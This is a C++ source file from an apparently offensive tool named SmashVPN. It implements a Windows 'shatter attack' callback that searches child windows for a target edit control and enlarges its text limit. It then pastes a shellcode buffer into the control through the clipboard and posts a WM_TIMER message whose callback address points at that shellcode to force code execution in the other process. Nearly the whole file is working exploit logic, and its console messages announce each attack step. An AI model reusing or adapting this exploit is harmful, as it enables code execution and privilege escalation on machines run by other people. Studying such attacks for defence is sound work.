//
//	SmashVPN
//
//	InspectChild.cpp
//
//	Callback function for EnumChildWindows()
//
//	Checks to see if the window it was handed is the control
//	named as lParam.
//

#include "SmashVPN.h"

BOOL CALLBACK InspectChild( HWND hWnd, LPARAM lParam )
{
	DWORD		dwLength;
	DWORD		dwCopied;
	BOOL		bResult;
	char		*lpszText;
	char		*lpszClass;
	WindowData	*wdInfo;
	HGLOBAL		hClip;
	LPVOID		lpvClipData;

	//	Initialize variables
	dwLength	= 0;
	dwCopied	= 0;
	bResult		= TRUE;
	lpszText	= NULL;
	lpszClass	= NULL;
	wdInfo		= (WindowData*)lParam;
	hClip		= NULL;
	lpvClipData	= NULL;

	//	Make room for the class information
	dwLength = strlen( wdInfo->lpszClass ) + 1;
	lpszClass = new char[ dwLength ];
	memset( lpszClass, 0, dwLength );

	//	Get the class information
	dwCopied = (DWORD)GetClassName( hWnd, lpszClass, dwLength );

	//	Is it the right class name?
	if (strcmp( lpszClass, wdInfo->lpszClass ) == 0)
	{
		//	Announce our success...
		cout<<"  Found a child window of class \""<<lpszClass<<"\""<<endl;
	
		//	Get the length of the text
		dwLength = SendMessage( hWnd, 
								WM_GETTEXTLENGTH, 
								0, 
								0 );

		if (dwLength > 0) 
		{
			//	Initialize a buffer
			lpszText = new char[ dwLength + 1 ];
			memset( lpszText, 0, ( dwLength + 1 ) );

			//	Grab the text
			dwCopied = SendMessage( hWnd, 
									WM_GETTEXT, 
									(dwLength + 1), 
									(LPARAM)lpszText );

			if (strcmp( wdInfo->lpszTitle, lpszText ) == 0)
			{
				//	Say hi
				cout<<"Child window contains specified text: \""<<lpszText<<"\""<<endl;
				cout<<"  Child's window handle is: "<<(DWORD)hWnd<<endl;
				//	No need to enumerate further
				bResult = FALSE;

				//	Set the new length parameter
				dwCopied = SendMessage( hWnd,
										EM_SETLIMITTEXT,
										(WPARAM)wdInfo->dwLength,
										0 );

				cout<<"Sent message setting text limit to "<<wdInfo->dwLength<<" characters"<<endl;

				//	Open the clipboard
				if (OpenClipboard( NULL ) == 0)
				{
					cout<<"* Could not open clipboard: "<<GetLastError()<<endl;
				} else {
					cout<<"  Opened the clipboard."<<endl;
			
					EmptyClipboard();

					hClip = GlobalAlloc( GMEM_MOVEABLE | GMEM_DDESHARE, 
										 dwSploitLength );

					if (hClip == NULL)
					{
						cout<<"* Could not allocate memory: "<<GetLastError()<<endl;
					} else {
						lpvClipData = GlobalLock( hClip );
					
						if (lpvClipData == NULL)
						{
							cout<<"* Could not lock clipboard buffer: "<<GetLastError()<<endl;
						} else {
							//	Put the data into that memory
							memcpy( lpvClipData, lpszSploit, dwSploitLength );

							//	Put it on the clipboard
							if (GlobalUnlock( hClip ) == 0)
							{
								if (SetClipboardData( CF_TEXT, hClip ) == NULL)
								{ 
									cout<<"* Could not set clipboard data: "<<GetLastError()<<endl;
								} else {
									if (CloseClipboard() == 0)
									{ 
										cout<<"* Could not close clipboard: "<<GetLastError()<<endl;
									}

									//	Paste
									dwCopied = SendMessage( hWnd,
															WM_PASTE,
															(WPARAM)0,
															(LPARAM)0 );

									cout<<"  Pasted shellcode into the control"<<endl;
									cout<<"  Callback address will be: "<<wdInfo->dwAddress<<endl;

									dwCopied = PostMessage( (HWND)hWnd,
															WM_TIMER,
															0,
															(LPARAM)wdInfo->dwAddress );

									cout<<"Sent timer message to the control"<<endl;
								}	//	(could we set clipboard data?)
							} else {
								cout<<"* Could not unlock clipboard buffer: "<<GetLastError()<<endl;
							}	//	(could we unlock the buffer?)
						}	//	(could we lock the buffer?)
					}	//	(could we allocate memory?)
				}	//	(could we open the clipboard?) 
			}	//	(did we find the appropriate window?)

			//	Put the heap back the way you found it
			delete lpszText;
		}	//	(was there text worth speaking of?)
	}	//	(is this child window of the proper class?)
	
	//	All done
	return( bResult );
}	//	(InspectChild)